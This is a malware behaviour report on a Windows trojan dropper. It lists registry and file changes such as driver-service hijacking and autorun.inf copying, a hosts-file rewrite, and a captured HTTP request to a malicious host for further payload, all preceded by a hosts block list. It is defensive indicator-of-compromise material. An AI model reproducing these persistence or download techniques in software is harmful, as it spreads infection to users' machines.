127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
Analysis Report:
##############
File: 1.exe
Size: 1033728
MD5: 19AB525B9AF6CBB40F428115E8148522
Virus Found: Trojan.Dropper (Symantec), Win32/Heur (AVG), TR/Crypt.FKM.Gen (AntiVir), Mal/EncPk-EE (Sophos)
On the VirusTotal website, only 20 out of 40 AV detected it (details).
Summary:
=======
The Trojan will modify the PCIDump service, add several .sys files such as acpiec.sys into your C:\Windows\system32 folder. It will also copy itself and add a autorun.inf to C:\. It will also copy phpi.dll into C:\Windows folder.
It changes the Hosts file and try to connect to www.cvbasefwdase.cn via HTTP to download other files. Likely to be trying to download more malicious payload.
Techincal Details:
################
Registry keys added:
==============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\ControlSet001\Services\pcidump
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\pcidump
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell
Registry keys deleted:
==============
HKLM\SYSTEM\ControlSet001\Services\PCIDump
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump
Registry values added:
===============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG\Trace Level: ""
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\ControlSet001\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\1.rkr: 09 00 00 00 06 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "MyDocuments"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-12691: "My Recent Documents"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\1.exe: "Microsoft ???????"
Registry values deleted:
================
HKLM\SYSTEM\ControlSet001\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Type: 0x00000001
Registry values modified:
=================
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: C9 5A 15 C4 25 28 78 C3 EA 94 2F FD E9 49 6F 86 00 EA EC 29 33 E7 A4 37 AE D9 53 A6 3F 7C 0F 9B 7C B4 0C C8 B7 B8 C6 6C 07 CD 75 47 55 88 CC E0 E4 31 36 49 C8 36 EC C6 A7 CD 6C 87 BB 2A 41 42 B9 55 42 B9 53 0C FE 7F 17 BA 4B E4 32 E0 33 4D
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 72 0B C5 74 CD 96 F6 DF 3D 2D 96 32 0A 0B CE ED 24 AA AA E6 4B 52 CE B7 C5 99 30 82 1D 4B 31 65 A0 C0 4F 8B B2 E5 FE 0B BE EF A8 61 B8 FD 4B 5C C6 59 F8 9B 2E E8 7C B8 AF 3C EE 3E 34 74 23 78 5D DC 0E E7 05 99 3D D5 4B A3 48 5B 66 6C 8E 38
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000006
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000014
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000002
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000A
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 61 00 00 00 A0 22 D9 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 62 00 00 00 20 EB 67 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9E 00 00 00 40 D7 FC 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9F 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 05 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 05 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF CE 00 00 00 24 00 00 00 26 03 00 00 18 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF E6 00 00 00 37 00 00 00 3E 03 00 00 2B 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000006
Files added:
========
C:\WINDOWS\system32\CatRoot2\tmp.edb
C:\WINDOWS\system32\dllcache\acpiec.sys
C:\WINDOWS\system32\drivers\OLD5.tmp
C:\WINDOWS\system32\drivers\pcidump.sys
C:\WINDOWS\system32\func.dll
C:\WINDOWS\LastGood\system32\drivers\acpiec.sys
C:\WINDOWS\phpi.dll
C:\1.exe
C:\autorun.inf
Files modified:
==========
C:\Documents and Settings\Owner\Cookies\index.dat
C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\Owner\ntuser.dat.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\setupapi.log
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\CatRoot2\edb.log
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\drivers\acpiec.sys
C:\WINDOWS\system32\drivers\etc\hosts
Folder added:
=========
C:\WINDOWS\LastGood
C:\WINDOWS\LastGood\system32
C:\WINDOWS\LastGood\system32\drivers
Other behaviours:
============
>System connecting to www.cvbasefwdase.cn:80
The following HTTP request found:
Get /new.txt HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.cvbasefwdase.cn
Connection: Keep-Alive
>System listening on UDP as va9sdhun23.cn:1030
>Running "rundll32.exe" as a process
>Change the hosts file with the following entries:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
